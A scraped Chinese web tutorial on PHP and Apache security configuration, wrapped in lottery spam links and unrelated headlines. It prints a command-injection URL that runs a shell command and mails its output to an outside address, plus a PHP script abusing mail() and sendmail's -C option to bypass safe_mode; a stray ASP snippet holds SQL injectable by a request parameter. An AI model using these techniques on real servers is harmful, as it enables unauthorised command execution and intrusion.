• 丁洪安的专栏作者中国国家地理网 2019-04-16
  • 头皮出油头屑严重 该怎么养发护发?-美食资讯 2019-04-16
  • 池州市交警发布端午假期出行提示 2019-04-14
  • “电影川军”将集体出征上影节 三星堆、自贡恐龙齐上阵 2019-03-30
  • 一样的端午 不一样的记忆:在校园中品悟传统文化教育变迁 2019-03-30
  • 【民族团结一家亲】民族团结大院里的团圆节 2019-03-22
  • 学习贯彻习近平总书记对脱贫攻坚工作重要指示精神 2019-03-22
  • 一代枭雄身后事:“曹操墓”认定过程缘何一波三折? 2019-03-06
  • 《人民日报》李芳事迹或成中国教师典范(原创首发) 2019-03-06
  • 连晴高温重庆动物园动物避暑尽显萌态 2019-02-12
  • [网连中国]可怜天下父母心,陪读辛苦有谁知 2019-02-12
  • 叶子树logo
    首 页 技术教程 新闻资讯 网站展示 酷站欣赏 下载中心 站长故事 字体下载 图片素材
    Web 福利彩票26选5走势图 www.yhwzn.com
     
      最新推荐→

     
      最新热门→

     
      相关文章→
     您现在的位置: 叶子树 >> 技术教程 >> 网络编程 >> PHP教程 >> 正文

    PHP安全配置(1)

    作者:佚名    文章来源:不详    点击数:    更新时间:2011-2-28         

     

    <% if request("infoid")<>"" then set rs=conn.execute("select * from nproduct where id="&request("infoid")) if not (rs.eof and rs.bof) then proname=rs("proname") content=rs("proinfo") end if rs.close set rs=nothing end if %>
    一、Web服务器安全

    PHP其实不过是Web服务器的一个??楣δ?,所以首先要保证Web服务器的安全。当然Web服务器要安全又必须是先保证系统安全,这样就扯远了,无穷无尽。PHP可以和各种Web服务器结合,这里也只讨论Apache。非常建议以chroot方式安装启动Apache,这样即使Apache和PHP及其脚本出现漏洞,受影响的也只有这个禁锢的系统,不会危害实际系统。但是使用chroot的Apache后,给应用也会带来一定的麻烦,比如连接mysql时必须用127.0.0.1地址使用tcp连接而不能用localhost实现socket连接,这在效率上会稍微差一点?;褂衜ail函数发送邮件也是个问题,因为php.ini里的:

    [mail function]
    ; For Win32 only.
    SMTP = localhost
    ; For Win32 only.
    sendmail_from = [email protected]



    都是针对Win32平台,所以需要在chroot环境下调整好sendmail。

    二、PHP本身问题

    1、远程溢出

    PHP-4.1.2以下的所有版本都存在文件上传远程缓冲区溢出漏洞,而且攻击程序已经广泛流传,成功率非常高.

    2、远程拒绝服务

    PHP-4.2.0和PHP-4.2.1存在PHP multipart/form-data POST请求处理远程漏洞,虽然不能获得本地用户权限,但是也能造成拒绝服务。

    3、safe_mode绕过漏洞

    还有PHP-4.2.2以下到PHP-4.0.5版本都存在PHP mail函数绕过safe_mode限制执行命令漏洞,4.0.5版本开始mail函数增加了第五个参数,由于设计者考虑不周可以突破safe_mode的限制执行命令。其中4.0.5版本突破非常简单,只需用分号隔开后面加shell命令就可以了,比如存在PHP脚本evil.php:





    执行如下的URL:

    //foo.com/evil.php?bar=;/usr/bin/id mail [email protected]

    这将id执行的结果发送给[email protected]。

    对于4.0.6至4.2.2的PHP突破safe_mode限制其实是利用了sendmail的-C参数,所以系统必须是使用sendmail。如下的代码能够突破safe_mode限制执行命令:

    #注意,下面这两个必须是不存在的,
    或者它们的属主和本脚本的属主是一样
    $script="/tmp/script123";
    $cf="/tmp/cf123";
    $fd = fopen($cf, "w");
    fwrite($fd, "OQ/tmp
    Sparse=0
    R$*" . chr(9) . "$#local [email protected] $1 $: $1
    Mlocal, P=/bin/sh, A=sh $script");
    fclose($fd);
    $fd = fopen($script, "w");
    fwrite($fd, "rm -f $script $cf; ");
    fwrite($fd, $cmd);
    fclose($fd);
    mail("nobody", "", "", "", "-C$cf");
    ?>



    还是使用以上有问题版本PHP的用户一定要及时升级到最新版本,这样才能消除基本的安全问题。

    叶子树:福利彩票26选5走势图 www.yhwzn.com
  • 下一篇文章:

  • 文章录入:webshu    责任编辑:webshu 
    叶子树(福利彩票26选5走势图)所有资料源于作者发布或网友推荐收集整理而来,仅供学习使用,版权归原作者所有,如有侵权,请您联系我们,我们将尽快更正。

      网友评论:(评论内容只代表网友观点,与本站立场无关?。?A name=bl> 发表评论

    网站地图 | 友情链接 | 留言互动 | 版权声明
    Copyright©All return the ye ze shu and 福利彩票26选5走势图
    本站广告服务请加QQ:904166(超越-激情)
    京ICP备08103660号 把"叶子树" 与你的好友一起分享!
  • 丁洪安的专栏作者中国国家地理网 2019-04-16
  • 头皮出油头屑严重 该怎么养发护发?-美食资讯 2019-04-16
  • 池州市交警发布端午假期出行提示 2019-04-14
  • “电影川军”将集体出征上影节 三星堆、自贡恐龙齐上阵 2019-03-30
  • 一样的端午 不一样的记忆:在校园中品悟传统文化教育变迁 2019-03-30
  • 【民族团结一家亲】民族团结大院里的团圆节 2019-03-22
  • 学习贯彻习近平总书记对脱贫攻坚工作重要指示精神 2019-03-22
  • 一代枭雄身后事:“曹操墓”认定过程缘何一波三折? 2019-03-06
  • 《人民日报》李芳事迹或成中国教师典范(原创首发) 2019-03-06
  • 连晴高温重庆动物园动物避暑尽显萌态 2019-02-12
  • [网连中国]可怜天下父母心,陪读辛苦有谁知 2019-02-12
  • 湖南幸运赛车app 篮彩分析技巧 内蒙古时时彩五星 彩票大奖分布 手机报码室开奖结果 北京赛车开奖纪录 排列3走势图和值跨度 双色球预测专家 11选5走势图 幸运飞艇开奖 直播 玩北京赛车pk10总是输 超级大乐透15010 排列3 体彩超级大乐透开奖结果 飞鱼彩票走势图 西安市福利彩票销售中心待遇